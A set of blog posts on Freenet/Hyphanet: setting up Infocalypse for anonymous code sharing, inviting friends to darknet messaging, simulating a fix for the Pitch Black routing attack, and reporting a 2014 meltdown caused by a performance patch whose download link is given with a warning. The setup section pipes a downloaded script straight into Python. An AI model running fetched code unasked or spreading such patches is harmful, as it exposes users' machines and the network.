In-Freenet-link: CHK@rtJd8ThxJ~usEFOaWAvwXbHuPC6L1zOFWtKxlhUPfR8,21XedKU8YbKPGsYWu9szjY7hChX852zmFAYuvyihOd0,AAMC--8/setup_infocalypse_on_linux.sh

The script allows you to get and setup the infocalypse extension with a few keystrokes to be able to instantly use the Mercurial DVCS for decentral, anonymous code-sharing over freenet.

« Real Life Infocalypse »
DVCS in the Darknet. The decentralized p2p code repository (using Infocalypse)

This gives you code hosting like a minimal version of BitBucket, Gitorious or GitHub but without the central control. Additionally the Sone plugin for freenet supplies anonymous communication and the site extension allows creating static sites with information about the repo, recent commits and such without the need of a dedicated hoster.

Basic Usage

Clone a repo into freenet with a new key:

hg clone localrepo USK@/repo

(Write down the insert key and request key after the upload! Localrepo is an existing Mercurial repository)

Clone a repo into or from freenet (respective key known):

hg clone localrepo freenet://USK@<insert key>/repo.R1/0
hg clone freenet://USK@<request key>/repo.R1/0 [localpath]

Push or pull new changes:

hg push freenet://USK@<insert key>/repo.R1/0
hg pull freenet://USK@<request key>/repo.R1/0

For convenient copy-pasting of freenet keys, you can omit the “freenet://” here, or use freenet:USK@… instead.

Also, as shown in the first example, you can let infocalypse generate a new key for your repo:

hg clone localrepo USK@/repo

mind the “USK@/” (slash after @ == missing key). Also see the missing .R1/0 after the repo-name and the missing freenet://. Being able to omit those on repository creation is just a convenience feature - but one which helps me a lot.

You can also add the keys to the <repo>/.hg/hgrc:

[paths]
example = freenet://USK@<request key>/repo.R1/0
example-push = freenet://USK@<insert key>/repo.R1/0
# here you need the freenet:// !

then you can simply use

hg push example-push

and

hg pull example

Contribute

This script is just a quick sketch, feel free to improve it and upload improved versions (for example with support for more GNU/Linux distros). If you experience any problems, please contact me! (i.e. write a comment)

If you want to contribute more efficiently to this script, get the repo via

hg clone freenet://USK@73my4fc2CLU3cSfntCYDFYt65R4RDmow3IT5~gTAWFk,Fg9EAv-Hut~9NCJKtGaGAGpsn1PjA0oQWTpWf7b1ZK4,AQACAAE/setup_infocalypse/1 

Then hack on it, commit and upload it again via

hg clone setup_infocalypse freenet://USK@/setup_infocalypse

Finally share the request URI you got.

Alternate repo: http://draketo.de/proj/setup_infocalypse


  1. On systems based on Debian or Gentoo - including Ubuntu and many others - this script will install all needed software except for freenet itself. You will have to give your sudo password in the process. Since the script is just a text file with a set of commands, you can simply read it to make sure that it won’t do anything evil with those sudo rights

AnhangGröße
setup_infocalypse_on_linux.sh.txt2.39 KB
setup_infocalypse_on_linux.sh.txt2.39 KB
setup_infocalypse_on_linux.sh_1.txt2.49 KB
setup_infocalypse_on_linux.sh_.txt2.75 KB

Let us talk over Hyphanet, so I can speak freely again

I sent this email to many of my friends to regain confidential private communication. If you want to do the same, feel free to reuse the text-version (be sure to replace the noderef textblock with your own noderef from http://127.0.0.1:8888/friends/myref.txt). This text is also available in Hyphanet.

About 10% of my friends joined - which is enough to build the darknet and makes it possible for me to speak freely again.

First: The Essence of this text:

I’ve been censoring my emails for years. Not just what I write, but also whom and when.

Hyphanet allows me to write invisible messages to my friends. Those are messages I do not need to censor. They give me freedom. Surveillance can show that we could write, but not whether, when or what we actually write. If Hyphanet is used for that, it needs very little resources.

This is how to connect:

  1. Download and install Hyphanet from https://freenetproject.org or https://www.hyphanet.org
  2. in the automatically opened setup wizard select “only friends”
  3. Copy the textblock1 you got with my email and paste it into the textfield on http://127.0.0.1:8888/addfriend/
  4. Then just send me what Hyphanet shows on the page http://127.0.0.1:8888/friends/myref.txt (attach it to an email or just copy it into the email)

As soon as I add you, too, we are connected. We can then write messages via the friends page (click my name):

Hi,

I’ve been self-censoring what I write by email for years. But over the past year, with ever more details of surveillance being proven as fact and not just conspiracy theory, that became more serious: I no longer see email as safe, and with that, email is lost for me as a medium for personal communication. If I want to talk privately, I don’t use email.

You might have noticed that since then I’ve been writing fewer and fewer non-public emails.

This started impeding my life, when the critical law reporter at groklaw stopped publishing, because the owner did not consider sending information via email as safe anymore. Now I self-censor what I write, to whom I write, and when I write.

There is now no shield from forced exposure.2

But I have one haven left: Instead of writing private stuff by email, I’m communicating more and more via Hyphanet, especially with darknet contacts: People I know personally. And I’d like to do that with you, too. The reason is that Hyphanet Darknet messages hide even the information that we have a conversation at all:

I can finally send completely invisible messages.

This gives me the confidentiality back which allows talking freely. Talking without self-censoring every word I write.

And I would like to have that freedom when talking to you online. So I would be very happy if you’d install Hyphanet and connect to me over Darknet.

Install Hyphanet

To install Hyphanet, just go to https://freenetproject.org and click the green install-button

Then click through the installer as usual. After that your browser should open and show the Hyphanet Setup Wizard.

The Wizard

In the wizard, choose "Connect only to friends: (high security)".

For the following questions, just use the default or the option called "normal".

You can always revisit the wizard at http://127.0.0.1:8888/wizard/

Connect with me

Now go to the page “connect to a friend”: http://127.0.0.1:8888/addfriend/

There simply paste the following into the empty text field below the blurp of explanation (note: for this article I replaced the identifying info with X-es. Use your own from http://127.0.0.1:8888/friends/myref.txt):

identity=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  
lastGoodVersion==XXXXXXXXXXXXXXXXXXXXXXX  
location==XXXXXXXXXXXXXXXXXXXXXXXX  
myName=XXXXXXX  
opennet=XXXXX  
sigP256=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  
version==XXXXXXXXXXXXXXXXXXXXXXX  
ark.number=XXXX  
ark.pubURI=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  
auth.negTypes=XX  
ecdsa.P256.pub=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  
physical.udp==XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  
End

Just put my name in the description above the “Add” button and leave everything else at default.

Then send me an email3 with the text you find at the URL http://127.0.0.1:8888/friends/myref.txt

Once I copy that text into my own addfriends page, our computers will connect over Hyphanet.

(no need to babysit Hyphanet for this: simply let it run when you’re online and as soon as I add you, our Computers will connect over Freenet. Please give me a few days: With the PhD and the two little ones I’m often no longer able to answer email daily, but I see them)

And that’s it. We’re connected. In the rest of this mail, I’ll describe what you can do with Hyphanet.

Welcome to Hyphanet, where no one can watch you read!

I hope we will connect soon!

Best wishes, Arne

Using Hyphanet

Talk with me over Hyphanet

Once we are connected, you can send me confidential messages by going on the Friends page and clicking my name.

Friends-page: http://127.0.0.1:8888/friends/

That page lists all the people you are connected to. You can also tick the checkbox for multiple people and then use the drop down list “– Select Action –” and select “Send N2NTM to selected peers”. A N2NTM is a “node to node text message”.

You can see all messages you received on the messages page:

Messages-page: http://127.0.0.1:8888/alerts/

These messages are invisible to the outside.

Send me files over Hyphanet

If you want to send me bigger files, you can upload them from the upload page:

Upload-page: http://127.0.0.1:8888/insertfile/

When they finish uploading, just go to the list of Uploads, select the files you want to share with me and click the button “Recommend files to friends”. Then select my name and click the “Recommend” button at the bottom.

List of Uploads: http://127.0.0.1:8888/uploads/

You can also do the same for downloads, so it’s easy to pass on files.

The files you upload are stored encrypted in Hyphanet and can only be found by people who have the Link to the file. Like a filehoster, but it is encrypted and completely decentralized.

Advanced Hyphanet Usage

What I show here aren’t all the features of Hyphanet. Not by a long shot. But it’s enough to provide confidential communication between friends:

I can talk to you without self-censoring every single thought.

If you want to explore further features of Hyphanet, there are three central features:

  • Bookmarks to have hidden websites which inform you when they are updated.
  • Your own website in Hyphanet.
  • Anonymous Discussions with a Web of Trust to prevent spam.

Bookmarks

Bookmarks are easy. Just go to the main freenet page and click the [Edit] link above the bookmarks. It gets you to the bookmarks editor for changing and sharing bookmarks.

Bookmark-editor: http://127.0.0.1:8888/bookmarkEditor/

Websites in Hyphanet

Websites in Hyphanet are also simple. To get a basic website, just install the ShareWiki plugin, enter text, click publish and once the upload finished, send the URL to your friends by clicking “share” in the list of uploads. With this you can publish in Hyphanet: Your friends will know that it’s your site, but no one else.

Configure Plugins: http://127.0.0.1:8888/plugins/ The key for sharewiki to add as “Plugin from Hyphanet”: CHK@aCQTjPQI3uGsahMiTuddwJ51UJypA5Mqg4y0tf1VqXQ,eEkO3uge6IJ1QcrT5KGlJ1R6kEcMhQV4rXfv6NzoL5o,AAMC–8/ShareWiki-b17.jar

(note: ignore the search box on the main page. It’s broken)

Anonymous Discussions

Anonymous Discussions are somewhat different from the other features, because they require the Web of Trust, and that is very heavyweight.

If you want to keep the resource consumption of Hyphanet low, avoid the anonymous discussion platforms.

You will see people recommend it - even me. It is cool, but you should only enable it, if you have a computer which always runs and for which it does not matter when it runs at high load.

If you only want confidential communication with Friends, just avoid the Web of Trust for now. If you stick to the basic features (darknet messages, uploads, downloads bookmarks), Hyphanet will require few resources and little bandwidth.

For a low-spec computer or a laptop, avoid the Web of Trust and anonymous discussions: They are really cool, but still require lots of resources.

If you value truly anonymous discussions higher than keeping the load on your computer low, or if you have a computer which is always running, have a look at the Hyphanet Social Networking guide. It shows you how to setup and use the social features of Hyphanet.

Freenet Social Networking Guide: http://freesocial.draketo.de

Have fun in Hyphanet!

Troubleshooting

High resource usage

If Hyphanet makes your fans run at full speed and your disk cackle, you can fix that with three steps:

Technical details


  1. Censored version of my textblock (you’ll get an uncensored version by email) identity=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    lastGoodVersion==XXXXXXXXXXXXXXXXXXXXXXX
    location==XXXXXXXXXXXXXXXXXXXXXXXX
    myName=XXXXXXX
    opennet=XXXXX
    sigP256=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    version==XXXXXXXXXXXXXXXXXXXXXXX
    ark.number=XXXX
    ark.pubURI=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    auth.negTypes=XX
    ecdsa.P256.pub=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    physical.udp==XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    End 

  2. Groklaw: Forced exposure 

  3. Naturally it would be better to send the freenet addfriend text via encrypted emails with a full chain of trusted signatures. But for the basic goal of confidential communication that is not necessary. We can check sometime later, whether the text we exchanged was changed, so if someone wants to eavesdrop, we can detect that. And we would have proof, which would make for the next great story for political magazines like Panorama - which would help a lot at fighting surveillance on the long term (so it’s unlikely that people who want surveillance will dare to do that). Example: “NSA targets privacy conscious” in german public media documentation

AnhangGröße
connect-over-freenet-01.txt11.32 KB

Lots of site uploads into freenet

I just finished lots of new uploads of sites into freenet - with the new freesitemgr (which actually uploads quickly when WoT is disabled, check todays IRC-logs tomorrow to get background on that). You can get the new freesitemgr from github.com/ArneBab/lib-pyfreenet-staging or via infocalypse:

hg clone freenet://USK@kDVhRYKItV8UBLEiiEC8R9O8LdXYNOkPYmLct9oT9dM%2CdcEYugEmpW6lb9fe4UzrJ1PgyWfe0Qto2GCdEgg-OgE%2CAQACAAE/pyfreenet.R1/14 

The sites are also available via my freenet inproxy:

freenet-team - an introduction of most of the freenet hackers I know.

mathmltest - example of mathml in freenet.

winterface-deadlines - deadlines for the Winterface GSoC project

freenet-funding - the freenet fundraising plan, still lacking good design and crisp presentation slides or a video

freenet-meltdown - on the recent massive performance degradation which lasted a few month and ended with the link length fix.

fix-link-length - background on the link-length fix which made freenet actually do small world routing again instead of random routing (into which it had degraded, partially due to local requests, partially due to having so many peers per node that random routing actually worked for the current network size, so the pressure by routing-success to go back to small world routing was too weak compared to the pressure from local requests to randomize the connections)

download-web-site - how to download a single page from a website - for example to mirror it into freenet. Hint: For all the sites on draketo.de or 1w6.org you are allowed to do so freely (licensed under GPL).

guiledocs - the online documentation for GNU Guile with a focus on Scheme (using Guile): A powerful lisp-like language with multiple implementations.

decorrespondent-metadata - experiment how much information one can glean about your life from just one week of metadata, in dutch.

netzpolitiz-metadaten - same article translated to german. License: cc by-nc-sa

Adventures of a Pythonista in Schemeland - the adventures of a Pythonista in Schemeland: A deep understanding of Scheme for Python users. I learned to love Scheme with this. BSD license.

programming-languages - The Programming languages lecture. License: cc by-nc-sa

tao of programming - "When you have learned to snatch the error code from the trap frame, it will be time for you to leave."

Mitigate the Pitch Black attack (the simulation works)

I fixed a small bug in the simulator of thesnark. With that, the simulator shows that the defense against the Pitch Black Attack works: A small number of attackers can no longer kill parts of the keyspace and can also no longer make certain parts of the keyspace inaccessible.

Attackers can still limit the convergence of the network towards a reproduction of the small world network, but since we know that Opennet works quite well with 30% backoff, this limited convergence should suffice for efficient routing.

peer distances under attack

I also identified two possible ways to make the algorithm more efficient.

The fix does not need to know the size of the network. The only global information it needs is routing to random locations.

In this mail I first describe simulator and Pitch Black Attack. Afterwards I describe the fix. The fix was originally proposed by Oskar Sandberg. He did all the hard work, I just describe it here.

Graphics

Peer Distances - Location histogram

(because that’s what most people really want ☺)

These show that the fix prevents complete fracturing of the keyspace: It recreates the short connections.

The simulator

Most of the simulation is the work of Michael Grube. I just fixed a small bug.

  • Michaels Repo: http://github.com/mgrube/pbsim
  • My Repo: http://github.com/ArneBab/pbsim

The network starts with a random network and then optimizes it — either with clean swapping or under attack without and with different countermeasures.

To run the simulation, run

./testfixpitchblack.py

You need pylab and networkx (links are in README.md).

The Pitch Black Attack (the problem)

Optimizing the network with swapping works pretty well without attacks (within the mathematical limits1) — as shown in the simulation ("clean swapping network"). But this can currently be broken easily, even by a single attacker, using the Pitch Black Attack.2

Swapping exchanges keys and implicitly trusts randomly selected nodes. Two nodes compare their peers, and if they determine that exchanging their locations improves the link length distribution to their respective group of peers, they swap the locations. Node A now has the former location of node B and node B has the former location of node A.

Normally that’s no problem: The probability that this trust is violated is just the proportion of attackers in the network. So some swapping will wrong, but this will only happen rarely.

There is one lasting effect however: If node B always hands out the same location when swapping, this location will stay in the network indefinitely and former location of node A will be lost. This is slow, only one key can be killed per swapping, but highly effective.

Using the Pitch Black Attack, attackers can remove selected locations From the network (which allows for censorship by making selected files with known keys inaccessible, because nodes with their content change to locations which won’t be searched for this content).

The fix for this has been pending since 2008 because “We have solutions for this but they are still being tested.” (https://freenetproject.org/about.html#papers). I consider this testing to be done with this email. The fix works (described as follows).

Approach

To fix the Pitch Black Attack nodes route to a random location and check the distance of the closest node they can reach. If this distance is much larger than expected, they consider the network to be under attack and switch to this location to fill the gap they found.

If detection and filling of gaps is faster than creation of gaps by the Pitch Black Attack, this reduces the Pitch Black Attack from a death stroke to a nuisance.

Requirements

  1. The network must be stable for (a) a random network and (b) a network with a cluster of small-world structured nodes embedded in a random network. The algorithm must not mistake (a) or (b) as attacked networks, otherwise swapping will not be able to change a random network to a small world network.

  2. In case of an attack, nodes must switch do positions inside the created gaps to fill them.

  3. When switching locations, content must be preserved close to the old location.

Information used

The simulated algorithm only uses the estimated number of peers (also known as outdegree), the distance to direct peers and actual routing. It does not need the size of the network.

The number of peers is used to calculate the expected distance to a location in a randomly structured network. More exactly: The mean distance plus two standard deviations (97.5% of random routes will find a shorter distance than this). Let’s call this expected random distance range d_er. As far as I can reconstruct it, this distance was calculated by Oskar using statistics. I just use brute force, as shown in https://github.com/ArneBab/pbsim/blob/master/bruteforcemindist.py

This is the magic number 0.037. If you choose a set of six random locations in the circular keyspace [0..1) repeatedly and stop when the closest of these locations isn’t closer to a target than on the previous try, and you re-run this experiment repeatedly, then 95% of the results will be closer than 0.037. It’s the 95% limit of the distance to a target in a random network with outdegree 6.

The basic algorithm

Before starting to swap, a freenet node first selects a random location. Let’s call it l. Then it routes towards this location and notes the distance of the node closest to this location. Lets call it d.

Now it calculates the mean distance to its direct peers. Let’s call this d_mean

If the distance d minus the mean distance to the peers d_mean is larger than the expected random distance range d_er, the node assumes that the random location l is within a gap. Instead of starting a swap request, it switches to this tested location l.

if (d - d_mean) > d_er: switch to l else: initiate swap

d - d_mean compares the routing result with the distribution of direct peers. If the gap is bigger than the mean distance to the peers, it might be a real gap, purely from local information.

(d - d_mean) > d_er ensures that even if the peers have the same location (d_mean = 0), this is only treated as gap if d is larger than the distance which would be found on 95% of routing tries in a random network, d_er. This ensures that even when there is a small optimized group within a large randomized network (for example when the network grows quickly), the nodes in the optimized group will not mistake the routing quality outside the optimized group as attacked network.

Adaptions

Median distance

During experimentation I found that using mean peer distance means that nodes with more long-distance connections are less likely to detect a gap. An attacker might be able to segment the network so that every node has a few long-distance connections to prevent detection of gaps. I tried to fix this using the median distance to peers instead of the mean distance, since the median is less sensitive to outliers.

use d_median instead of d_mean

This was the most effective adjustment, but I need help from someone with deeper knowledge about network statistics to test this.

Route to two targets

If the constant minimum distance for random networks (d_er) should prove problematic, we can reduce the value of d_er by doing two routing tries with different targets and check the shorter of the two distances but switch to the target with the larger distance. d_er would then for example be only around 0.02 instead of 0.037). But for this the simulation results have been unclear.

Avoid data loss

Update: Reinsertion is not needed, because a node which swaps to a random location will very likely swap back to a location closer to its neighbors within the next few swapping operations.

If a node changes its location by a large distance, this means that the content it holds cannot be found anymore. To fix this, it needs to re-insert all content in its store.

This is no large problem with basic swapping, because there the locations should stabilize, changing only in small ways. In case of an attack, it becomes important, though.

While it sounds expensive to re-insert all content in the store, it should not actually cost too much, since we can assume that most peers of the node will be close to its old location. So it could simply insert the content in its store with a HTL around 2 and still be confident to reach the right nodes.

Conclusion

This solution mitigates the Pitch Black Attack with moderate cost. Under attack the network no longer converges completely, but it still reaches a more optimized state of which I would expect that it suffices for routing.

It would be great to have more math on this, but I think it’s already ready for implementation.

Please comment!

Best wishes, Arne Babenhauserheide


  1. Stefanie Roos showed that efficient convergence is not possible under churn, but this should not affect Freenet too badly, because in friend-to-friend mode many connections are extremely long lived, often on the order of years. Therefore real churn (as in permanently lost connections) is extremely low compared to other systems which often have lifetimes on the order of hours. 

  2. This was shown by Christian Grothoff: http://grothoff.org/christian/pitchblack.pdf @conference{pitchblack, title = {Routing in the Dark: Pitch Black}, booktitle = {23rd Annual Computer Security Applications Conference (ACSAC 2007)}, year = {2007}, pages = {305{\textendash}314}, publisher = {IEEE Computer Society}, organization = {IEEE Computer Society}, abstract = {In many networks, such as mobile ad-hoc networks and friend-to-friend overlay networks, direct communication between nodes is limited to specific neighbors. Often these networks have a small-world topology; while short paths exist between any pair of nodes in small-world networks, it is non-trivial to determine such paths with a distributed algorithm. Recently, Clarke and Sandberg proposed the first decentralized routing algorithm that achieves efficient routing in such small-world networks.

    This paper is the first independent security analysis of Clarke and Sandberg{\textquoteright}s routing algorithm. We show that a relatively weak participating adversary can render the overlay ineffective without being detected, resulting in significant data loss due to the resulting load imbalance. We have measured the impact of the attack in a testbed of 800 nodes using minor modifications to Clarke and Sandberg{\textquoteright}s implementation of their routing algorithm in Freenet. Our experiments show that the attack is highly effective, allowing a small number of malicious nodes to cause rapid loss of data on the entire network.

    We also discuss various proposed countermeasures designed to detect, thwart or limit the attack. While we were unable to find effective countermeasures, we hope that the presented analysis will be a first step towards the design of secure distributed routing algorithms for restricted-route topologies.}, keywords = {denial-of-service, Freenet, installation, routing}, url = {http://grothoff.org/christian/pitchblack.pdf}, author = {Nathan S Evans and Chis GauthierDickey and Christian Grothoff} } 

News of the day — and using Freenet as decentralized, pseudonymous communication backend for applications

This is a proposal I wrote for the NLnet Open call for funding 2016-12. It got into the short list but was not selected, so I’m sharing it here. Maybe it spikes your interest or serves as inspiration for something exciting you want to realize with Freenet. I still plan to do this, but in hobby-time it will likely take a few years to realize instead of the 6 months I had planned. Initial work is available in pyFreenet/babcom_cli

The project

The goal of this project is to provide a working, anonymous communication system which can be used as library to add privacy-respecting communication features to any application.

The focus of the communication system is providing the news-of-the-day. News-of-the-day is a concept to reduce information overload: Every user can select the two most important news items of the day which are then shared with his or her subscribers on the next day. One of these is self-written, one is forwarded from other news items the user saw.

By avoiding any centralized infrastructure, the project will be free of external pressure (i.e. needing to fund the infrastructure through advertisements, or attempts to censor information) which cause other projects to focus on engagement instead of actual news.

To provide these features, it builds on Freenet, a decentralized platform for pseudonymous publishing and communication which was started in 2000 and is currently used by about 8000 people. Freenet provides publishing under a pseudonym without needing to run a server as well as completely decentralized spam-prevention. The spam-prevention will also allow users to limit fake-news by treating pseudonyms who repeatedly promote fake-news as spammers.

The target community

The community is twofold: On the one hand desktop-users who want to reduce their information overload without missing important news items. With important in the meaning defined by the following quote:

“Whatever a patron desires to get published is advertising; whatever he wants to keep out of the paper is news,” — 1918, Anonymous (quoted in The Fourth Estate: A Newspaper for the Makers of Newspapers)

On the other hand application developers who want to add communication features into their programs without having to worry about violating the privacy of their users when a server is breached and without having to build and maintain a centralized back-end infrastructure.

Usage of the money

10 000€ will be used to improve the scalability of the spam-prevention method in Freenet¹ and another 10 000€ to improve the response times². These are the two tasks I cannot do easily myself. In addition, 4000€ will be used to allow me to reduce my working hours for 3 months without impacting the family budget too strongly. Another 1000€ will be used for presenting the project at programming conventions.

¹: Improving the scalability should require about 6 weeks of work in the ideal case, with 10 weeks the more realistic estimate. This will be done by hiring the main developer of the spam-prevention method for implementing the detailed plan described in this task: https://bugs.freenetproject.org/view.php?id=3816#c12182

²: The spam-prevention method in Freenet reacts slowly due to over-locking. I will hire an external developer to profile the code and solve the problems which impact the use-cases relevant for my project.

What is new?

On the feature-side, the new approach is encouraging the users to choose only a limited number of most important items, while providing real anonymity along with decentralized spam-protection so users can promote what they deem newsworthy without having to worry about their public image.

On the technical side, the main new approach is to tie together established and tested methods provided by Freenet (this has never been done before, partly due to missing documentation how to harness them) and to use these methods for implementing communication features in external applications.

The technical approach is described in the Freenet Communication Primitives I published end of last year: http://www.draketo.de/light/english/freenet/communication-primitives-2-discovery

This project will also form the core of the third part of the Freenet Communication Primitives.

How will promote the project to your target community?

To reach users as early adopters, I will promote early stages directly in Freenet. When the system reaches stability, I will contact websites which write about privacy-tools. I am already in contact with one of the writers for deepdotweb which has a good reach into the group of privacy aware people who are willing and able to invest into trying a new tool.

To reach developers, I will present the project at programming conventions which are one of the major source of actionable information about usable libraries. I will back this with simple tutorials about using the project to add communication tools to other programs.

On the 2014 freenet-meltdown

Update (2018-04-14): After 3 years of testing we could confidently decrease the minimum required connections to 6 (for 10 KiB/s upload speed) and still get good scaling thanks to the link length fix. This was released as Freenet build 1480. This yielded the same transfer speeds with lower CPU requirements and with much better scaling for high bandwidth nodes.

Update (2014-09-06): The meltdown is stopped and reversed. We implemented the link length fix and this solved an issue with the network structure we had for the last few years. We’re currently watching anxiously, whether the performance only comes back to the performance before the backdown or whether the lifetime actually gets much better. Watch the fetch-pull stats!

Current Fetch Performance, 1 day

^ inserted one day ago: You see the meltdown starting in april and the improvement with the latest version: It’s back on at least the level before the meltdown.

Current Fetch Performance, 4/2 weeks

^ 4 weeks ago inserted, 2 weeks ago accessed. If this goes above 0.6 starting 2014-09-19, the improvement could prove to be huge: It could give us much longer lifetimes of data in freenet.

Update (2014-07-23): The fetch-pull graphs look like we have oscillating here. This could mean that this is NOT an attack, but rather the direct effect of the KittyPorn patches: First the good connections get broken. This ruins the network. Then they can’t get any worse and the network recovers. Then they break again. This is still speculative. For an up to date plot, see fetchplots1.

Update (2014-05-22): The performance stats are much better again and the link-length distribution recovered. We might have been hit by an attack after all (which failed to take down freenet, but hurt pretty much). With some luck we’ll soon see a paper published with the evaluation of the attack and ways to mitigate it cleanly. (hint to computer scientists: we link to papers from the freenetproject.org website, so if you want to get a small boost for your chances of citation, send the link to your paper to devl@freenetproject.org)

Summary: There is a freenet patch floating around which claims to increase performance. The reality is (to our current-knowledge), that it breaks the network as soon as more than a few percent run it. And this is the case, which is why the network is almost completely broken right now. If you run that patch, please get rid of it!

Freenet is currently experiencing a meltdown, with extremely slow downloads, high connection churn and lifetimes for bigger files down to about a day. For a visualization, see the fetch-performance in the following graph and take note of the drop at the end. It nicely shows how a bad patch spread while more and more users installed it (hoping for better performance) and slowly killed the network. When that line goes below 50%, bigger files are dead approximately one day after being uploaded.

Fetch Performance (thanks for these stats goes to fetchpull from digger3)

We suspect that patch, because the number of nodes reporting 100 or more connections in the anonymised probe-stats increased a lot over the past few weeks (this is only possible with a patched freenet) and the link-length-distribution almost completely lost a bump it had at 0.004, suggesting that freenet essentially reverted to random routing, while the number of nodes did not change significantly.

connections per node
link length distribution
number of freenet nodes which report stats
(thanks for these stats goes to probe stats which operhiem1 implemented in Google Summer of Code 2012)

We are working on creating a clean solution.

Freesites still work, because the SSK-queue did not get hammered, so if you are a freesite author, please inform your readers about the patch and ask them to get rid of it!

In case you use freenet and want information on that patch, please read the note from TheSeeker:

Information from TheSeeker in IRC (#freenet @ freenode)

Recently Kittyporn released an autopatcher-script: CHK@r6dUGAYs2No4lWT3DTkY2dIYdgA-eoBAcU~U-kLU-0I,hxGN5OTN4j~04YnCS4UTflMK4fpW2hfhB58CU1KNRAw,AAMC--8/FNAutoPatch-1.0_by_Kittyporn.rar

This increased usage of the patch by probably several hundred nodes, judging by the partial logs from the webserver that we have for fetches of the source tarball.

The script stupidly pulls the freenet source from freenetproject.org rather than say, github, or freenet. Really bad for anonymity, but good for tracking.

logs only go back a couple weeks, which is why they are incomplete, and we don't know the real number of people that have run it. hard to tell how much less the people that are cheating feel the effects of the whole network collapsing around them. surely can't be long before they too start complaining about speeds given the data retention issues it's causing.

NLM was supposed to fix all this shit. :|

modified nodes are flooding the network, creating broad backoff issues. this makes routing suffer, and avg path lengths increase, which reduces overall availability of bandwidth and more backoff and more misrouting. Death spiral until we hit some equilibrium that is roughly equal to random routing.

essentially what the broken NLM did. thankfully, it is only routing for bulk chk, so it'll still be possible to do some things if forced through the realtime queue... e.g. if we want to deploy an update, and have the constituent blocks actually get routed anywhere near the correct destination...

Additional comment

To do the math: a few hundred users easily equals 10% of the network. No wonder we have a meltdown.

and even worse, these few hundred users are likely the high-bandwidth folks with a huge number of connections.

Let’s assume that they each have 40 connections while the others have ~10. Every node connected to such an abusive node will essentially be blocked. That’s 100% of the nodes…

40 other nodes wrecked × 10% = ouch!

AnhangGröße
fetchpull-stats-1148-fetchplots1.png43.8 KB
probe-stats-489-plot_link_length.png6.67 KB
probe-stats-489-plot_peer_count.png7.64 KB
probe-stats-489-year_900x300_plot_network_size.png26.24 KB
fetchpull-stats-1228-fetchplots1.png46.38 KB

Real Life Infocalypse

Freenet Logo: Follow the Rabbit DVCS in the Darknet. The decentralized p2p code repository.

In this guide I show by example how you can use the Infocalypse plugin for distributed development without central point of failure or reliance on unfree tools.12

If you think “I have no idea what this tool is for”: Infocalypse gives you fully decentralized Github with real anonymity, using only free software.

# freenet -> local
hg clone freenet://ArneBab/life-repo
# local -> freenet
hg clone life-repo real-life
hg clone real-life freenet://ArneBab/real-life
# send pull request
cd real-life
hg fn-pull-request --wot ArneBab/life-repo
(enter message)
# check for pull-requests
cd ../life-repo
sleep 1800 # (wait for confidential delivery)
hg fn-check-notifications --wot ArneBab

If you like this, please don’t only click like or +1, but share it with everyone who could be interested. The one who knows best how to reach your friends is you — and that’s how it should be.

Update 2024: Infocalypse is still recovering from Python 3 breakage. Most of it works again, but there may be rough edges left. Contributions to fix these are very welcome: hg.sr.ht/~arnebab/infocalypse or github.com/hyphanet/infocalypse.

Setup

(I only explain the setup for GNU/Linux because that’s what I use. If you want Infocalypse for other platforms, come to the #freenet IRC channel so we can find the best way to do it)

Freenet Setup

Install and start Freenet. This should just take 5 minutes.

Then activate the Web of Trust plugin and the Freemail plugin. As soon as your Freenet is running, you’ll find the Web of Trust and Freemail plugins on the Plugins-Page. This link will work once you have a running Freenet. If you want to run Freenet on another computer, you can make it accessible to your main machine via ssh port forwarding: ssh -NL 8888:localhost:8888 -L 9481:localhost:9481 <host>.

Now create a new Pseudonym on the OwnIdentities-page.

Infocalypse Setup

Install Mercurial, defusedxml, PyYAML for Python2. The easiest way of doing so is using easy_install from setuptools:

cd ~/
echo '
export PATH="${PATH}:~/.local/bin:~/bin"
export PYTHONPATH="${PYTHONPATH}:~/.local/lib64/python2.7:~/.local/lib/python2.7"
export PYTHONPATH="${PYTHONPATH}:~/lib/python2.7:~/lib64/python2.7"
' >> ~/.bashrc
source ~/.bashrc
wget https://bootstrap.pypa.io/ez_setup.py -O - | python2.7 - --user
easy_install --user --egg Mercurial defusedxml PyYAML pyFreenet==0.4.0

Then get and activate the Infocalypse extension:

hg clone https://hg.sr.ht/~arnebab/infocalypse
echo '[extensions]' >> ~/.hgrc
echo 'infocalypse=~/infocalypse/infocalypse' >> ~/.hgrc

Infocalypse with Pseudonym

Finally setup Infocalypse for the Pseudonym you created on the OwnIdentities-page. The Pseudonym provides pull-requests and for shorter repository URLs.1

hg fn-setup --truster <Nickname of your Web of Trust Pseudonym>
hg fn-setupfreemail --truster <Nickname of your Web of Trust Pseudonym>

That’s it. You’re good to go. You can now share your code over Freenet.

